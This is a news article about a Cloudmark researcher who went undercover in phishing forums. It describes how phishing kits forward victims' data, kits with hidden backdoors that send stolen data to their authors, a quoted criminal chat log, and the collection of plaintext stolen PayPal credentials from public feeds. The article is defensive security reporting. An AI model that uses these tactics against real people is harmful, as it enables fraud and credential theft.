W3C Valid XHTML 1.0
Going undercover in the slimy world of phishing

Jason Harbert was a terrible spammer.

The research scientist for Cloudmark recently spent weeks monitoring the phishing community’s chat rooms and forums, learned the lingo, earned some trust, and even received kits from the fraudsters who set up scam pages that steal victims’ personal data. Then he went and hurt the criminals’ feelings after not coming through on the spam delivery.

But he did come out of the experience with extensive data and insight on every aspect of the underground marketplace, including how the attacks are orchestrated and how phishing kits work—including their structure, so-called “brain files” and even new pyramid schemes linked to the spread of the kits.

After weeks of undercover research into the phishing community, Cloudmark contends that the availability of these automated phishing kits, costing $10 or $20, has made it a breeze for novices to start up operations and has caused a sharp rise in phishing attacks.

Hacker toolkits are nothing new. Recent news reports have even pointed to certified ethical hacking toolkits for sale on eBay, which contained similar items still for sale as of Sept. 21.

Security vendor Tier-3, headquartered in Sydney, shrugs off the proposition that these above-ground sales are above-board in their connection to ethical hacking certification, saying that they contain surreptitious Trojan loaders and Web site hacking utilities that can be used for criminal black-hat hacking.

PointerClick here to read how a crook used the release of the latest Harry Potter book as the front for a phishing scam.

“It basically puts high-level hacking tools … into the hands of almost any Internet user— including novices— providing they have an eBay and PayPal account,” said Tier-3 CTO Geoff Sweeney in a statement.

How to Talk Like a Phisher

Sweeney said that where previously would-be hackers “had to score ‘brownie points’ to gain access to the hacker forums and source the kits”—as did Harbert— the fact that they are now on open sale on eBay is “very worrying.”

Although he hasn’t looked at the eBay kits, Harbert said that if what Sweeney claims is true, the ethical kits are likely being used to commit cyber-crimes. “Most ethical hacking courses focus [on] techniques, rather than hacking kits, per se,” Harbert said. “But, there may be ethical hacking kits that I’m not aware of. If there are, it is almost certain that they would be leaked to the black-hat hackers and used for fraudulent activities.”

The number of phishing reports hit an all-time high of 55,000 in April, according to a trend report put out at the time by the Anti-Phishing Working Group.

The rise in phishing attacks, Cloudmark says, is due both to the profits involved and the ease of carrying them out. Phishing kits—aka “scam pages” in the phishing community—are a collection of files to create a comprehensive phishing site.

The individual components work to automatically collect, store and send a victim’s personal information back to the phisher. They’re widely available, the company says, and typically cost $10 to $20, often sold in a group with multiple kits targeted to specific financial institutions or organizations, such as Bank of America or eBay.

Harbert described the phishing community as being made up of specific roles and jobs. The role of a spammer, for example, is to create and send e-mail messages with a link to the phishing site.

Spammers often use botnets to send messages in bulk in a short period of time. Using botnets means spammers can hit the inboxes of a large number of people before anti-spam products latch onto the message within the spam and begin to filter for it.

Another role in the community is that of the casher. These community members advertise their services in cashing out compromised bank accounts, such as Wells Fargo accounts.

Cloudmark published a whitepaper on the undercover work in which the company quoted this sample discussion from a phishing channel:

14:29 <Droper> cashout any us bank like Wachovia, Wells, Chase, Citibank, Boa, Wamu amd all uk banks and some Canada Banks also Pick WU and MG and drops for merchandise and drop for Billpay msg me for deal

14:31 <jiciuvyu> i have e-gold, root, paypal, poste.it, php mailer, php sender inbox, scam pages, ebay extractor, mail extractor, bank logins, and need wells drop prv me

The user with the handle “Droper” is a casher advertising the banks he or she can extract currency from. The other user, “jiciuvyu,” is advertising phishing tools and information available and also is requesting a “wells drop,” meaning a Wells Fargo bank account to transfer—or to “drop”—money into.

After talking the talk for a few weeks, Harbert convinced users to send tools and phishing kits. He found within the kits HTML files, PHP files and a variety of Web files.

Would-be phishers unzip a kit and run it. When deployed on a server, the kit creates an automatic phishing attack. The phisher inserts his or her e-mail address into the configuration file so that when a victim falls for the attack, his or her information is automatically forwarded to the phisher.

What surprised Harbert, he said, was to find that the variety of kits all shared a common set of back-end files—what he calls the “brain files,” with the same names.

Phishing monitoring companies are seeing an explosion of these kits—not surprising, given that they’re “simple, easy and cheap” to run, Harbert said.

Looking deeper, he discovered that novice phishers are actually being scammed by advanced phishers. Those advanced phishers are writing and selling kits that include secret, obfuscated code that e-mails stolen information not only back to the primary phisher but to the original phisher who sold him or her the kit.

Harbert also discovered what he says is a new phishing variant: the storage of stolen information in flat text files. Besides e-mailing the information to phishers, the kits are also writing all data to text files in the directory of a given attack. Harbert found that those text files have common names. Those names are actually viewable on sites that report real-time phishing attacks, as does Cloudmark.

After writing a script to automatically retrieve the text files from such sites, Harbert was able to find PayPal account numbers from plain flat text files—in other words, PayPal accounts in plain, unencrypted text. He thus obtained 15,000 PayPal accounts, including user names and passwords, using no phishing techniques whatsoever—just a simple automated search on publicly available feeds.

Harbert also discovered a new trend within the community: unique attacks for every victim. Kits that create unique scam URLs for each target are a highly desirable thing for phishers, given that they render the shutdown of a particular attack irrelevant.

Another role in the community is that of the rip-off artist who steals from the phishers. Called a “ripper,” such an individual promises to cash out a compromised account but instead just takes off with the money.

Armed with such terms, Harbert said it was easy to infiltrate the community. “Just go in and talk the talk, say you’re interested, that you want to make a lot of money, that you want to help them with attacks,” he said. “I pretended to be a spammer. … A lot of phishers sent a kit, and I didn’t do the work, and they were really kind of heartbroken. One guy told me I really hurt his feelings.”

 
ABOUT THE AUTHOR
Lisa Vaas's picture
Status: Offline
Member Since: 3-31-2009
Post Count: 2
Comments